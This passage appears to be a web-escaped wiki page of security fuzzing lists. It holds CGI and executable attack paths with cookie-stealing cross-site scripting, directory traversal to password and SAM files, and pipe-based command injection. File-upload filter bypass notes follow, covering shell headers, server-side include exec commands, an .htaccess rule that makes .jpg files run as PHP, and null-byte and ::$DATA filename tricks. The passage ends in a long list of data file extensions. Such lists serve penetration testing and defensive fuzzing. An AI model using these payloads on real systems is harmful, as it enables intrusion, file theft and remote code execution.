cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
